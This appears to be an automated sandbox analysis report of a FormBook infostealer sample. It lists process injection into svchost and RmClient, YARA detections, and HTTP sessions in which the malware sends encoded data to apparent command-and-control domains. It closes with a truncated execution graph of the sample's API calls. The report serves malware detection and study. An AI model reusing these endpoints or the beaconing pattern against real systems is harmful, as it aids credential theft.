                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 4c 44 53 37 2f 76 31 50 37 59 52 38 4a 34 45 34 30 39 4c 5a 77 35 50 44 68 64 38 76 77 37 50 5a 57 55 36 48 68 61 31 63 34 4c 2f 65 77 39 34 57 4b 51 48 6e 7a 48 59 6f 2f 49 49 30 30 52 4a 31 39 2f 55 30 7a 49 59 64 45 4d 75 75 46 59 6d 6d 45 64 7a 2f 76 44 4f 52 30 35 35 47 48 64 77 49 4b 32 50 76 51 5a 78 71 45 78 75 77 35 34 38 32 42 47 51 78 77 4b 6a 64 6b 30 67 46 44 49 78 30 38 6f 4e 4f 43 54 42 4c 49 79 2b 58 37 4e 6d 39 4f 67 2f 2f 43 6d 63 69 38 75 66 33 38 72 6d 67 4b 31 79 4b 77 47 54 64 38 59 42 68 4d 44 6d 48 6c 65 6f 54 64 33 36 43 6e 4b 45 2f 45 51 66 37 4b 45 75 4a 77 4d 70 44 47 51 59 70 70 39 50 51 2b 39 71 7a 66 50 6a 33 7a 63 6d 49 73 68 77 32 57 76 62 70 63 63 30 45 71 76 35 4f 6d 39 37 55 70 5a 61 39 73 6c 4a 2b 66 71 68 2f 57 31 44 50 35 43 2b 59 6d 70 64 2b 72 51 4d 43 51 37 47 53 6f 39 57 58 64 31 46 63 4f 32 68 63 6f 48 50 63 37 70 74 36 4f 35 45 36 2b 57 53 6f 56 4e 54 4b 51 52 2f 77 4c 62 54 52 61 36 79 76 46 73 [TRUNCATED]
                                                                                                                     Data Ascii: nzs0T2= [TRUNCATED]


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     24 | 192.168.2.6 | 50012 | 208.91.197.27 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:50:35.627979040 CET | 588 | OUT | GET /sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                     Jan 10, 2025 20:50:36.650183916 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:35 GMT
                                                                                                                    Server: Apache
                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                    Set-Cookie: vsid=907vr4840842358331150; expires=Wed, 09-Jan-2030 19:50:35 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly
                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAhWApJtlyOfhkbz25UuTo9BGc8Ug92SOg2rvUqQgzQnAQw0Awd2Vj2Xuc1dBIGXLBP2KCHOA74zxPqQYrK5HA==
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 38 32 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e
                                                                                                                    Data Ascii: 82b1<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                     Jan 10, 2025 20:50:36.650217056 CET | 1236 | IN | Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66
                                                                                                                    Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in w
                                                                                                                     Jan 10, 2025 20:50:36.650228024 CET | 1236 | IN | Data Raw: 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26
                                                                                                                    Data Ascii: n(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages"
                                                                                                                     Jan 10, 2025 20:50:36.650233984 CET | 1236 | IN | Data Raw: 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65
                                                                                                                    Data Ascii: ges" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.su
                                                                                                                     Jan 10, 2025 20:50:36.650239944 CET | 1236 | IN | Data Raw: 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e
                                                                                                                    Data Ascii: cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{i
                                                                                                                     Jan 10, 2025 20:50:36.650250912 CET | 1236 | IN | Data Raw: 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79
                                                                                                                    Data Ascii: {if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribut
                                                                                                                     Jan 10, 2025 20:50:36.650266886 CET | 1236 | IN | Data Raw: 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68
                                                                                                                    Data Ascii: (a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersio
                                                                                                                     Jan 10, 2025 20:50:36.650278091 CET | 1236 | IN | Data Raw: 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79
                                                                                                                    Data Ascii: n"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!
                                                                                                                     Jan 10, 2025 20:50:36.650288105 CET | 1236 | IN | Data Raw: 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77
                                                                                                                    Data Ascii: p_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventL
                                                                                                                     Jan 10, 2025 20:50:36.650299072 CET | 1236 | IN | Data Raw: 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f
                                                                                                                    Data Ascii: type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><script type="text/javascript">function
                                                                                                                     Jan 10, 2025 20:50:36.650310993 CET | 1236 | IN | Data Raw: 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2e 65 6f 74 22 29 3b 73 72 63 3a 20 75 72 6c 28 22
                                                                                                                    Data Ascii: n-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot");src: url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix") format("embedded-opentype"),url("http://i4.cdn-image.com/__media__/fon


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     25 | 192.168.2.6 | 50013 | 76.223.67.189 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:50:58.232202053 CET | 836 | OUT | POST /3irn/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.infovea.tech
                                                                                                                    Origin: http://www.infovea.tech
                                                                                                                    Referer: http://www.infovea.tech/3irn/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 44 58 64 4a 38 55 30 64 37 66 66 34 48 73 6c 43 32 65 6b 4b 6f 43 6e 50 64 6e 33 74 73 62 6b 78 49 44 69 65 72 79 55 57 36 5a 58 65 47 49 69 5a 30 47 4e 4e 76 4c 48 75 71 62 50 54 6e 2f 38 4f 2f 35 6f 4d 30 76 6a 49 51 6e 76 79 71 4a 76 34 49 4e 51 71 51 42 7a 55 6a 6b 55 68 6e 4e 35 4a 4e 77 33 56 47 2b 4e 72 63 50 72 48 35 51 33 33 61 65 4a 39 70 2b 55 75 55 64 64 73 6a 57 43 62 41 50 65 54 33 78 72 4f 62 36 76 62 47 77 2b 51 72 49 42 65 59 69 79 4e 33 4f 66 49 66 69 74 30 67 45 41 68 55 4d 63 34 5a 45 34 4e 74 68 77 36 50 73 38 77 31 44 2f 43 72 57 78 56 31 4c 64 41 6c 44 49 2b 71 7a 6c 4b 54 73 44 79
                                                                                                                    Data Ascii: nzs0T2=DXdJ8U0d7ff4HslC2ekKoCnPdn3tsbkxIDieryUW6ZXeGIiZ0GNNvLHuqbPTn/8O/5oM0vjIQnvyqJv4INQqQBzUjkUhnN5JNw3VG+NrcPrH5Q33aeJ9p+UuUddsjWCbAPeT3xrOb6vbGw+QrIBeYiyN3OfIfit0gEAhUMc4ZE4Nthw6Ps8w1D/CrWxV1LdAlDI+qzlKTsDy
                                                                                                                     Jan 10, 2025 20:50:58.721283913 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                    content-length: 0
                                                                                                                    connection: close

                                                                                                                    Target ID:0
                                                                                                                    Start time:14:47:50
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\9MZZG92yMO.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9MZZG92yMO.exe"
                                                                                                                    Imagebase:0x4c0000
                                                                                                                    File size:1'210'880 bytes
                                                                                                                    MD5 hash:7F427F12CD43C97F6647A6A39735EBA8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:14:47:53
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9MZZG92yMO.exe"
                                                                                                                    Imagebase:0x7b0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:14:48:13
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe"
                                                                                                                    Imagebase:0xef0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:6
                                                                                                                    Start time:14:48:15
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                                                                                                                    Imagebase:0x510000
                                                                                                                    File size:15'360 bytes
                                                                                                                    MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:14:48:28
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe"
                                                                                                                    Imagebase:0xef0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:10
                                                                                                                    Start time:14:48:56
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff728280000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                      Signature Coverage:9.7%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:157
101243->101152 101246 4fd29c 101251 4fd2b2 SetCurrentDirectoryW 101246->101251 101248 4c3bc3 GetFullPathNameW 101249 4c7bcc 59 API calls 101248->101249 101250 4c3bfe 101249->101250 101383 4d092d 101250->101383 101251->101243 101254 4c3c1c 101255 4c3c26 101254->101255 101497 51874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101254->101497 101399 4c3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101255->101399 101258 4fd2cf 101258->101255 101261 4fd2e0 101258->101261 101263 4c4706 61 API calls 101261->101263 101262 4c3c30 101264 4c3c43 101262->101264 101407 4c434a 101262->101407 101265 4fd2e8 101263->101265 101418 4d09d0 101264->101418 101268 4c7de1 59 API calls 101265->101268 101270 4fd2f5 101268->101270 101269 4c3c4e 101269->101239 101495 4c443a Shell_NotifyIconW _memset 101269->101495 101272 4fd2ff 101270->101272 101273 4fd324 101270->101273 101275 4c7cab 59 API calls 101272->101275 101274 4c7cab 59 API calls 101273->101274 101276 4fd320 GetForegroundWindow ShellExecuteW 101274->101276 101277 4fd30a 101275->101277 101280 4fd354 Mailbox 101276->101280 101498 4c7b2e 101277->101498 101280->101239 101282 4c7cab 59 API calls 101282->101276 101283->101222 101284->101227 101285->101229 101287 4c7667 59 API calls 101286->101287 101288 4c377c 101287->101288 101507 4c3d31 101288->101507 101290 4c379a 101291 4c4706 61 API calls 101290->101291 101292 4c37ae 101291->101292 101293 4c7de1 59 API calls 101292->101293 101294 4c37bb 101293->101294 101521 4c4ddd 101294->101521 101297 4c37dc Mailbox 101302 4c8047 59 API calls 101297->101302 101298 4fd173 101577 52955b 101298->101577 101301 4fd192 101304 4e2d55 _free 58 API calls 101301->101304 101305 4c37ef 101302->101305 101306 4fd19f 101304->101306 101545 4c928a 101305->101545 101308 4c4e4a 84 API calls 101306->101308 101310 4fd1a8 101308->101310 101314 4c3ed0 59 API calls 101310->101314 101311 4c7de1 59 API calls 101312 4c3808 101311->101312 101548 4c84c0 101312->101548 101316 4fd1c3 101314->101316 
101315 4c381a Mailbox 101317 4c7de1 59 API calls 101315->101317 101318 4c3ed0 59 API calls 101316->101318 101319 4c3840 101317->101319 101320 4fd1df 101318->101320 101321 4c84c0 69 API calls 101319->101321 101323 4c4706 61 API calls 101320->101323 101322 4c384f Mailbox 101321->101322 101327 4c7667 59 API calls 101322->101327 101324 4fd204 101323->101324 101325 4c3ed0 59 API calls 101324->101325 101326 4fd210 101325->101326 101328 4c8047 59 API calls 101326->101328 101329 4c386d 101327->101329 101330 4fd21e 101328->101330 101552 4c3ed0 101329->101552 101332 4c3ed0 59 API calls 101330->101332 101334 4fd22d 101332->101334 101340 4c8047 59 API calls 101334->101340 101336 4c3887 101336->101310 101337 4c3891 101336->101337 101338 4e2efd _W_store_winword 60 API calls 101337->101338 101339 4c389c 101338->101339 101339->101316 101341 4c38a6 101339->101341 101342 4fd24f 101340->101342 101343 4e2efd _W_store_winword 60 API calls 101341->101343 101344 4c3ed0 59 API calls 101342->101344 101345 4c38b1 101343->101345 101346 4fd25c 101344->101346 101345->101320 101347 4c38bb 101345->101347 101346->101346 101348 4e2efd _W_store_winword 60 API calls 101347->101348 101349 4c38c6 101348->101349 101349->101334 101350 4c3907 101349->101350 101352 4c3ed0 59 API calls 101349->101352 101350->101334 101351 4c3914 101350->101351 101353 4c92ce 59 API calls 101351->101353 101354 4c38ea 101352->101354 101355 4c3924 101353->101355 101356 4c8047 59 API calls 101354->101356 101357 4c9050 59 API calls 101355->101357 101358 4c38f8 101356->101358 101359 4c3932 101357->101359 101360 4c3ed0 59 API calls 101358->101360 101568 4c8ee0 101359->101568 101360->101350 101362 4c928a 59 API calls 101364 4c394f 101362->101364 101363 4c8ee0 60 API calls 101363->101364 101364->101362 101364->101363 101365 4c3ed0 59 API calls 101364->101365 101366 4c3995 Mailbox 101364->101366 101365->101364 101366->101236 101368 4c7292 __ftell_nolock 101367->101368 101369 4c72ab 101368->101369 101370 4fea22 _memset 101368->101370 
101371 4c4750 60 API calls 101369->101371 101373 4fea3e GetOpenFileNameW 101370->101373 101372 4c72b4 101371->101372 102185 4e0791 101372->102185 101375 4fea8d 101373->101375 101377 4c7bcc 59 API calls 101375->101377 101378 4feaa2 101377->101378 101378->101378 101380 4c72c9 102203 4c686a 101380->102203 101384 4d093a __ftell_nolock 101383->101384 102441 4c6d80 101384->102441 101386 4d093f 101387 4c3c14 101386->101387 102452 4d119e 89 API calls 101386->102452 101387->101246 101387->101254 101389 4d094c 101389->101387 102453 4d3ee7 91 API calls Mailbox 101389->102453 101391 4d0955 101391->101387 101392 4d0959 GetFullPathNameW 101391->101392 101393 4c7bcc 59 API calls 101392->101393 101394 4d0985 101393->101394 101395 4c7bcc 59 API calls 101394->101395 101396 4d0992 101395->101396 101397 504cab _wcscat 101396->101397 101398 4c7bcc 59 API calls 101396->101398 101398->101387 101400 4c3ab0 LoadImageW RegisterClassExW 101399->101400 101401 4fd261 101399->101401 102491 4c3041 7 API calls 101400->102491 102492 4c47a0 LoadImageW EnumResourceNamesW 101401->102492 101404 4c3b34 101406 4c39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101404->101406 101405 4fd26a 101406->101262 101408 4c4375 _memset 101407->101408 102493 4c4182 101408->102493 101411 4c43fa 101413 4c4414 Shell_NotifyIconW 101411->101413 101414 4c4430 Shell_NotifyIconW 101411->101414 101415 4c4422 101413->101415 101414->101415 102497 4c407c 101415->102497 101417 4c4429 101417->101264 101419 504cc3 101418->101419 101432 4d09f5 101418->101432 102660 529e4a 89 API calls 4 library calls 101419->102660 101421 4d0cfa 101421->101269 101424 4d0ee4 101424->101421 101426 4d0ef1 101424->101426 101425 4d0a4b PeekMessageW 101494 4d0a05 Mailbox 101425->101494 102658 4d1093 341 API calls Mailbox 101426->102658 101429 4d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101429->101421 101430 4d0f2a 101429->101430 101434 505c58 TranslateMessage DispatchMessageW GetMessageW 101430->101434 101431 4d0ce4 101431->101421 102657 
4d1070 10 API calls Mailbox 101431->102657 101432->101494 102661 4c9e5d 60 API calls 101432->102661 102662 516349 341 API calls 101432->102662 101433 504e81 Sleep 101433->101494 101434->101434 101436 505c88 101434->101436 101436->101421 101437 504d50 TranslateAcceleratorW 101440 4d0e43 PeekMessageW 101437->101440 101437->101494 101438 4c9e5d 60 API calls 101438->101494 101439 4d0ea5 TranslateMessage DispatchMessageW 101439->101440 101440->101494 101441 50581f WaitForSingleObject 101444 50583c GetExitCodeProcess CloseHandle 101441->101444 101441->101494 101443 4d0d13 timeGetTime 101443->101494 101478 4d0f95 101444->101478 101445 4d0e5f Sleep 101479 4d0e70 Mailbox 101445->101479 101446 4c8047 59 API calls 101446->101494 101447 4c7667 59 API calls 101447->101479 101448 505af8 Sleep 101448->101479 101450 4e0db6 59 API calls Mailbox 101450->101494 101452 4d0f4e timeGetTime 102659 4c9e5d 60 API calls 101452->102659 101453 4e049f timeGetTime 101453->101479 101456 505b8f GetExitCodeProcess 101459 505ba5 WaitForSingleObject 101456->101459 101460 505bbb CloseHandle 101456->101460 101457 4c9837 84 API calls 101457->101494 101458 4cb7dd 109 API calls 101458->101479 101459->101460 101459->101494 101460->101479 101463 545f25 110 API calls 101463->101479 101464 505874 101464->101478 101465 505078 Sleep 101465->101494 101466 505c17 Sleep 101466->101494 101468 